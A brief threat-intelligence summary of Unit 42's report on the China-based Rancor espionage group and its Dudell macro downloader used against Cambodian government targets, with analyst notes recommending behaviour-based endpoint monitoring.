Rancor: Rancor, a group based out of China, currently being tracked by Palo Alto Networks’ Unit 42 is back again with a new malware dubbed Dudell. It is believed that this malware was created and used most recently in attacks that occurred between December 2018 and January 2019 that targeted Cambodian government organizations. The sample found by Unit 42 featured similarities to another malware associated with Rancor that was used against other Southeast Asian governments. The downloader is disguised as a Microsoft Excel document with the intent of running malicious macros and dropping second stage malware payloads.
Analyst Notes
This group has been active since 2017, carrying out cyber espionage campaigns against entities located in Southeast Asia. This custom malware from the threat group uses the Derusbi malware family to load secondary payloads once the victim’s computer is infiltrated. Binary Defense analysts frequently find that the initial attack vector in many serious intrusions is malware that uses macros in Microsoft Excel and Word files, delivered through attachments or links in phishing email. Using a strategy such as behavior-based endpoint monitoring across an organization will provide detection that allows the company to know when they are being infiltrated and quarantine the problem before it takes over the network. The full Unit 42 Rancor report can be found here: https://unit42.paloaltonetworks.com/rancor-cyber-espionage-group-uses-new-custom-malware-to-attack-southeast-asia/
